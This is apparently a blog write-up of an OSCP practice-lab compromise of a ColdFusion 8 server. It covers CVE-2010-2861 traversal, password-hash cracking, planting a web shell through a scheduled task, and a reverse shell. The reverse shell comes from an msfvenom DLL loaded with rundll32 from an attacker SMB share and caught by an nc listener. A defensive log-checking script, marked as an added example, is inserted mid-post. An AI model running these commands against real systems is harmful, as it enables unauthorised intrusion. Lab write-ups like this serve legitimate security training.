As I continue my OSCP journey I have popped a few more boxes since my last blog. It has been about a month or two, so I figured I would write another one describing how I went from initially exploiting a directory traversal vulnerability to eventually getting shell access as SYSTEM on a Windows box running ColdFusion version 8.
Of course, I started off by running a port scan and vulnerability scan using Nmap.
nmap -sT -A --top-ports=20 x.x.x.x-254 -oG top-port-sweep.txt
nmap -A -sV --script=default,vuln -p- --open -oA tcp_10.11.1.x 10.11.1.x
To be honest though, what I really did was look at the results from the full Nmap vulnerability scan I ran against all devices once I got access to the labs. I mention this because when you get access to a hacking lab it is always a good idea to run a full scan in the background while you plug away. Below is the command I ran.
nmap -A -sV --script=default,vuln -p- --open -oA all-hosts 10.11.1.0/24
This gave me a file containing all the vulnerability information Nmap's scripts found on every device in that subnet block.
From the top-20 port scan I did not have much to go on. As a matter of fact, all top 20 ports appeared to be filtered.
Ports: 21/filtered/tcp//ftp///, 22/filtered/tcp//ssh///, 23/filtered/tcp//telnet///, 25/filtered/tcp//smtp///, 53/filtered/tcp//domain///, 80/filtered/tcp//http///, 110/filtered/tcp//pop3///, 111/filtered/tcp//rpcbind///, 135/filtered/tcp//msrpc///, 139/filtered/tcp//netbios-ssn///, 143/filtered/tcp//imap///, 443/filtered/tcp//https///, 445/filtered/tcp//microsoft-ds///, 993/filtered/tcp//imaps///, 995/filtered/tcp//pop3s///, 1723/filtered/tcp//pptp///, 3306/filtered/tcp//mysql///, 3389/filtered/tcp//ms-wbt-server///, 5900/filtered/tcp//vnc///, 8080/filtered/tcp//http-proxy///
This was interesting, but when I looked at the results from the vulnerability scan, port 80 (HTTP) was open, running IIS 6 with ColdFusion 8. When I browsed to the IP address there was no default web page set up.
As you can see in the picture above, a directory traversal vulnerability (CVE-2010-2861) is present on the device. In addition to that, the scan returned other data that I was not initially sure how to interpret.
After some basic Google searching I came across the following websites, which helped put into perspective what I could do with the initial vulnerability as well as what else I could do to ultimately get a command shell.
Apparently the vulnerability gives you access to the contents of a password file, which I later found out was the very information that appeared in the initial Nmap scan. This hash was the password for the ColdFusion admin portal. You could open the following URL in the browser to get the same information I had in the scan; the exact URL varies with the ColdFusion version.
There were also a few Python scripts available to glean the same information. Once I had the password hash, I used an online password cracker, https://crackstation.net/, and recovered the password.
I used that password to get into the ColdFusion admin page, which is usually found at this link.
Getting into an admin portal was cool, but of course I wanted more. How could I execute commands, and what privilege level did I have? Based on past experience I needed to find a way to upload a file, hopefully to get a shell, or at least to be able to run other commands or escalate privileges if needed. It turns out there is a way to upload files and run them through the admin portal: under debugging and logging there is the ability to schedule a task.
So I went to create a scheduled task. I first had to give it a task name, which could be anything. Then in the URL section I added my own web server and the file I eventually wanted to upload and run. Of course, I needed to make sure my web server was running, and I had to find a good malicious file to use to give me a web shell; back to that in a bit. The other information I needed before finishing the task was in the file section: I had to check the "save to output file" box and give it a location and file name. For the location I needed to find out the default mappings, so I went to the mappings section under server settings in the portal. I was looking for the directory path for /CFIDE, which in this case was C:\Inetpub\wwwroot\CFIDE. This is what needed to go into the file section, along with the file name.
Now for the malicious file: I found the site below, which had a good .CFM (ColdFusion) file.
This gave me a web shell that would allow me to run commands. This was the file name (cfexec.cfm) I gave in my task settings. Once complete, I needed to create the task and start it.
I moved to the browser and typed http://site/CFIDE/cfexec.cfm, which gave me a web shell. I ran whoami to see what access I had. I was lucky enough to already be SYSTEM, which was cool: privileges already escalated.
The next step was to get a command shell. To do this I basically did what I had done before, using rundll32.exe to call a file from an SMB share I created on my Kali box using Impacket.
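From the defender's side, the two web-visible traces of this chain are the traversal attempt against /CFIDE/ (CVE-2010-2861 above) and the later requests to a .cfm that the scheduled task dropped directly into the /CFIDE/ web root. The following Python checker is an added example and not part of the original post; the log lines are constructed in IIS W3C style, and the "a .cfm directly under /CFIDE/ is unexpected" heuristic is an assumption that should be tuned against a baseline of the files a given ColdFusion install ships with.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in IIS W3C style: date time method uri-stem uri-query status.
# Illustrative only; not captured from any real host.
SAMPLE_LOG = """\
2019-05-01 10:00:01 GET /index.htm - 404
2019-05-01 10:00:07 GET /CFIDE/administrator/enter.cfm file=..%2F..%2F..%2Fconstructed.txt 200
2019-05-01 10:01:12 GET /CFIDE/administrator/index.cfm - 200
2019-05-01 10:05:40 GET /CFIDE/cfexec.cfm cmd=whoami 200
2019-05-01 10:06:03 GET /CFIDE/scripts/cfform.js - 200
"""

# "../" or "..\" after decoding; the request is decoded twice to catch %25-style double encoding.
TRAVERSAL = re.compile(r"\.\.[/\\]")


def decode_twice(s: str) -> str:
    return unquote(unquote(s))


def classify(line: str) -> list:
    """Return the indicator names a single log line triggers (empty list if benign)."""
    parts = line.split()
    if len(parts) < 6:
        return []
    stem, query, status = parts[3], parts[4], parts[5]
    stem_d, query_d = decode_twice(stem), decode_twice(query)
    hits = []
    # 1. Path traversal attempt (the bug class behind CVE-2010-2861) against anything under /CFIDE/.
    if stem_d.lower().startswith("/cfide/") and (TRAVERSAL.search(stem_d) or TRAVERSAL.search(query_d)):
        hits.append("traversal_under_cfide")
    # 2. A .cfm served successfully straight from the /CFIDE/ root rather than the shipped
    #    administrator/ tree: in the post this is where the scheduled-task output landed.
    #    Assumption: compare against an allow-list of shipped files before alerting in production.
    if re.fullmatch(r"/cfide/[^/]+\.cfm", stem_d.lower()) and status == "200":
        hits.append("unexpected_cfm_in_cfide_root")
    return hits


def scan(log_text: str) -> dict:
    """Map the timestamp of each flagged line to its indicators."""
    findings = {}
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            findings[" ".join(line.split()[:2])] = hits
    return findings


if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_LOG).items():
        print(ts, ", ".join(hits))
```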
I ran rundll32.exe \\10.x.x.x\smb\shell.dll,0.
To create the shell file I used msfvenom, which gave me a reverse shell back on port 5555.
msfvenom -p windows/shell_reverse_tcp -f dll LHOST=10.x.x.x LPORT=5555 > ./shell.dll
With my Kali box listening with Netcat on port 5555, I got myself a shell.
nc -vlp 5555
Meet Anthony Giandomenico: The man behind "Illumin808"
Experienced Information Security Executive, Evangelist, Entrepreneur, and Mentor with over 20 years of experience. In his current position he is focused on delivering the knowledge, tools, and methodologies needed to properly demonstrate advanced threat concepts and defense strategies using a practical approach to security.
He has presented, trained and mentored on various security concepts and strategies at many conferences, trade shows and media outlets, including a weekly appearance on the KHON2-TV morning news "Tech Buzz" segment and Technology News Bytes on OC16, providing monthly security advice.
Mr. Giandomenico founded and managed Secure DNA Inc., a global security consulting company focused on protecting critical infrastructures such as financial institutions, hospitals, and government agencies. As a consultant, Anthony provided expertise in many areas including security program development, defensive strategies, incident response and forensics procedures, security assessments, penetration testing, and security operations.